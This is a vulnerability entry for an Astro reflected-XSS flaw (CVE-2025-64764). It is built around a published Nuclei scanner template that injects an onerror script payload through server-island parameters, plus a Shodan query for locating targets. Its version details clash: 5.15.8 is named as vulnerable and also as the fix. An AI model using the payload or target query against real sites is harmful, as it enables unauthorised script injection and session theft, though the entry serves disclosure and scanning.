漏洞描述
Astro 5.15.8 contains a reflected XSS caused by improper handling of server islands feature, letting remote attackers execute scripts, exploit requires use of server islands in the application.
CVE-2025-64764: Astro - Reflected XSS via server islands feature
PoC代码[已公开]
id: CVE-2025-64764
info:
name: Astro - Reflected XSS via server islands feature
author: DhiyaneshDk,zhero___
severity: high
description: |
Astro 5.15.8 contains a reflected XSS caused by improper handling of server islands feature, letting remote attackers execute scripts, exploit requires use of server islands in the application.
impact: |
Remote attackers can execute scripts in users' browsers, potentially leading to session hijacking or data theft.
remediation: |
Update to version 5.15.8 or later.
reference:
- https://zhero-web-sec.github.io/research-and-things/unlocking-reflected-xss-in-the-astro-framework
metadata:
verified: true
max-request: 2
shodan-query: html:"_server-islands"
tags: cve,cve2025,astro,xss,vkev
variables:
rand: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers:
- type: regex
part: body
regex:
- '/_server-islands/[^?]+\?e='
internal: true
extractors:
- type: regex
name: value
part: body
internal: true
group: 1
regex:
- '/_server-islands/([^?]+)\?e='
- raw:
- |
GET /_server-islands/{{value}}?e=file&p=&s={"{{rand}}":"<img+src=x+onerror=alert(0)>"} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "<img src=x onerror=alert(0)>")'
condition: and
# digest: 490a00463044022059e860f37367a2573255fd4a7bcd160982043b00bf607300b96da0a4d58a4d48022027db021aa711df2ba26686238d8d99c39e17b47d10e8666333c42fd58de6f5d2:922c64590222798bb761d5b6d8e72950